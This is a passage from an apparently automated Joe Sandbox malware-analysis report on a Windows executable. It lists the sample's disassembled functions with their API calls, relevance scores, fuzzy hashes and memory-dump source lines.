                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                      • String ID:
                      • API String ID: 1240663315-0
                      • Opcode ID: 116fd98b7db5d4140f84f63bf656e98fd661c9680a52bbeb151917b92e487117
                      • Instruction ID: efbac3d2c4afa975f371ae5d5fee671ec22ce1fa5a9a6cb729be810612663562
                      • Opcode Fuzzy Hash: 116fd98b7db5d4140f84f63bf656e98fd661c9680a52bbeb151917b92e487117
                      • Instruction Fuzzy Hash: A5E16E71614200AFCB54EF25C891D2FBBE4EF89314B04896EF84ADB3A2D634ED45CB56
                      Function 00474164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                      • String ID:
                      • API String ID: 1737998785-0
                      • Opcode ID: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
                      • Instruction ID: 6a8dd1f95291b63ae5b16d2a5a0d869dcb5166510358231783c1e180ef80644f
                      • Opcode Fuzzy Hash: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
                      • Instruction Fuzzy Hash: CE2191352002109FDB00AF54EC09B6E7BA8EF44751F10847AF945E72A2EB38AC05CB5D
                      Function 0046F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0046F440
                      • Sleep.KERNEL32(0000000A), ref: 0046F470
                      • _wcscmp.LIBCMT ref: 0046F484
                      • _wcscmp.LIBCMT ref: 0046F49F
                      • FindNextFileW.KERNEL32(?,?), ref: 0046F53D
                      • FindClose.KERNEL32(00000000), ref: 0046F553
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                      • String ID: *.*
                      • API String ID: 713712311-438819550
                      • Opcode ID: 92a288f11230d480a522b0c0f936cc6b9b9cd0aeee01b41ae93ea83b3e82efad
                      • Instruction ID: 52678bcd3f78e7a2dee1500e624958e336d76892905c76040bb4fc6126c74c58
                      • Opcode Fuzzy Hash: 92a288f11230d480a522b0c0f936cc6b9b9cd0aeee01b41ae93ea83b3e82efad
                      • Instruction Fuzzy Hash: D0418D71904219AFCF10EF64DC45AEFBBB4FF04314F50446BE855A2291EB38AE88CB59
                      Function 00413030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: __itow__swprintf
                      • String ID: 3cA$_A
                      • API String ID: 674341424-3480954128
                      • Opcode ID: a5756b0f92f9e2bfb68cf9ef7b4beb393605c20eebfb30cb75c238e5a0399993
                      • Instruction ID: 703a96bf305cb9905ff3d3c25826e0fcfbd93ba8a00a4d78e9854e8314894fca
                      • Opcode Fuzzy Hash: a5756b0f92f9e2bfb68cf9ef7b4beb393605c20eebfb30cb75c238e5a0399993
                      • Instruction Fuzzy Hash: AB229B716083009FD724DF14C881BABB7E4AF85314F11492EF89A97392DB78E945CB9B
                      Function 004651BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                        • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                        • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
                      • ExitWindowsEx.USER32(?,00000000), ref: 004651F9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                      • String ID: $@$SeShutdownPrivilege
                      • API String ID: 2234035333-194228
                      • Opcode ID: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
                      • Instruction ID: a9b7a44e2451b6884de2a96c8f52f71cfd0e95415fa4985b61f57267d5601e10
                      • Opcode Fuzzy Hash: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
                      • Instruction Fuzzy Hash: D201F7317916116BF7286668ACAAFBB7358DB05345F2008BBFD03E21D2FD591C058A9F
                      Function 00476283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                      Download Yara Rule
                      APIs
                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004762DC
                      • WSAGetLastError.WSOCK32(00000000), ref: 004762EB
                      • bind.WSOCK32(00000000,?,00000010), ref: 00476307
                      • listen.WSOCK32(00000000,00000005), ref: 00476316
                      • WSAGetLastError.WSOCK32(00000000), ref: 00476330
                      • closesocket.WSOCK32(00000000,00000000), ref: 00476344
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ErrorLast$bindclosesocketlistensocket
                      • String ID:
                      • API String ID: 1279440585-0
                      • Opcode ID: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
                      • Instruction ID: 9cc0b371228dcaf8913226d6fe42490e105b9b769aefcc5547ebbaeef9b3f94b
                      • Opcode Fuzzy Hash: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
                      • Instruction Fuzzy Hash: 6521F2312006049FCB10FF64C845A6EB7BAEF44324F15856EEC1AA73D2C734AC05CB59
                      Function 00415520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                        • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                      • _memmove.LIBCMT ref: 00450258
                      • _memmove.LIBCMT ref: 0045036D
                      • _memmove.LIBCMT ref: 00450414
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _memmove$Exception@8Throwstd::exception::exception
                      • String ID:
                      • API String ID: 1300846289-0
                      • Opcode ID: 4ff26fd221bb68c5114e90bbcabe878cf0622c85d295742c9c0d1e5c1d30364e
                      • Instruction ID: ce31bd404333394545349dab4fd8ad238969c684e33d592a62d2001407cdf1f6
                      • Opcode Fuzzy Hash: 4ff26fd221bb68c5114e90bbcabe878cf0622c85d295742c9c0d1e5c1d30364e
                      • Instruction Fuzzy Hash: 3202E270A00205DBCF04DF65D9816AEBBF5EF84304F54806EE80ADB392EB39D955CB99
                      Function 00401287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 004019FA
                      • GetSysColor.USER32(0000000F), ref: 00401A4E
                      • SetBkColor.GDI32(?,00000000), ref: 00401A61
                        • Part of subcall function 00401290: DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ColorProc$LongWindow
                      • String ID:
                      • API String ID: 3744519093-0
                      • Opcode ID: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
                      • Instruction ID: d041ec2a837aeb515327988813bafb0785b4d0a615f46c6b1421ede386c2745f
                      • Opcode Fuzzy Hash: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
                      • Instruction Fuzzy Hash: A4A124B1202544BAE629BA694C88F7F255CDF45345F14053FF602F62F2CA3C9D429ABE
                      Function 00476747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6
                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0047679E
                      • WSAGetLastError.WSOCK32(00000000), ref: 004767C7
                      • bind.WSOCK32(00000000,?,00000010), ref: 00476800
                      • WSAGetLastError.WSOCK32(00000000), ref: 0047680D
                      • closesocket.WSOCK32(00000000,00000000), ref: 00476821
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                      • String ID:
                      • API String ID: 99427753-0
                      • Opcode ID: 77a8c2a142281090e394b0e0d14c417a392868478e52ac264b4faa38142e6d55
                      • Instruction ID: 4f4fa4b069b112be458f20050bee2991dabce79e459f6d74e9331a247e2dcb9e
                      • Opcode Fuzzy Hash: 77a8c2a142281090e394b0e0d14c417a392868478e52ac264b4faa38142e6d55
                      • Instruction Fuzzy Hash: E941D275A00600AFDB10BF258C86F6E77A89F45718F05C56EFA59BB3C3CA789D008799
                      Function 00485376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                      • String ID:
                      • API String ID: 292994002-0
                      • Opcode ID: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
                      • Instruction ID: 2bf7cd1b22f0a435aba1bf6783624a0e9851140f374647b9b1574053626a0f4e
                      • Opcode Fuzzy Hash: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
                      • Instruction Fuzzy Hash: BB11B232700911ABEB217F269C44A6F7B99EF447A1B40483EFC45E3242DB789C0287AD
                      Function 004580A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: HeapInformationToken$AllocErrorLastProcess
                      • String ID:
                      • API String ID: 44706859-0
                      • Opcode ID: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                      • Instruction ID: 8dae455e1ba13099d0d58f164bb34b259a0b96a713bdc7d240504e0717c8d456
                      • Opcode Fuzzy Hash: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                      • Instruction Fuzzy Hash: EBF08C30200614AFEB104FA4EC8CE6B3BACEF4A755B10043EF90592251DF649C09DB64
                      Function 0046C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                      Download Yara Rule
                      APIs
                      • CoInitialize.OLE32(00000000), ref: 0046C432
                      • CoCreateInstance.OLE32(00492D6C,00000000,00000001,00492BDC,?), ref: 0046C44A
                        • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                      • CoUninitialize.OLE32 ref: 0046C6B7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CreateInitializeInstanceUninitialize_memmove
                      • String ID: .lnk
                      • API String ID: 2683427295-24824748
                      • Opcode ID: 2168bc15797479d4bf9d8be8a874f14214ce5ae81521c48187290a1a744f77cd
                      • Instruction ID: adb56a4b7a52abdaef05598002f92e73435f728c8d9d90c66f29e414dbdf6fe1
                      • Opcode Fuzzy Hash: 2168bc15797479d4bf9d8be8a874f14214ce5ae81521c48187290a1a744f77cd
                      • Instruction Fuzzy Hash: 5AA14AB1104205AFD700EF55C881EAFB7E8EF85308F00492EF595972A2EB75EE09CB56
                      Function 00404B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00404AD0), ref: 00404B45
                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404B57
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: GetNativeSystemInfo$kernel32.dll
                      • API String ID: 2574300362-192647395
                      • Opcode ID: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
                      • Instruction ID: eac2b9657e48c1354d3ce07b29e145d4c0a45f8badf8df95cafcbf2a1bd35060
                      • Opcode Fuzzy Hash: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
                      • Instruction Fuzzy Hash: 8ED01274A10713CFD720AF31D818B0A76E4AF45751B218C3F9485D6690D678F8C4C75C
                      Function 0047EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                      Download Yara Rule
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0047EE3D
                      • Process32FirstW.KERNEL32(00000000,?), ref: 0047EE4B
                        • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                      • Process32NextW.KERNEL32(00000000,?), ref: 0047EF0B
                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0047EF1A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                      • String ID:
                      • API String ID: 2576544623-0
                      • Opcode ID: 55b2806c571e794d70189e9b258b2a54ff26ce71ab56e674bdcd20fc5077a503
                      • Instruction ID: a98c0e68db7b9d45d0fd814aff1298f869d04e0007e226020b87bcf654703779
                      • Opcode Fuzzy Hash: 55b2806c571e794d70189e9b258b2a54ff26ce71ab56e674bdcd20fc5077a503
                      • Instruction Fuzzy Hash: BB519171504300AFD310EF21CC85EABB7E8EF88714F10492EF595A72A1DB34AD08CB96
                      Function 0045E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0045E628
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: lstrlen
                      • String ID: ($|
                      • API String ID: 1659193697-1631851259
                      • Opcode ID: 9168c4c44934064b777b19449f8ddf58753b33bee85af42b019ce53e691585fc
                      • Instruction ID: d66d97c7bb63d5e7dad9b567a4e3f94d41a6da7275ee88609bc8c1bec3a8e44c
                      • Opcode Fuzzy Hash: 9168c4c44934064b777b19449f8ddf58753b33bee85af42b019ce53e691585fc
                      • Instruction Fuzzy Hash: 21322675A007059FD728CF2AC481A6AB7F0FF48310B15C56EE89ADB3A2E774E941CB44
                      Function 004722EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                      Download Yara Rule
                      APIs
                      • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0047180A,00000000), ref: 004723E1
                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00472418
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
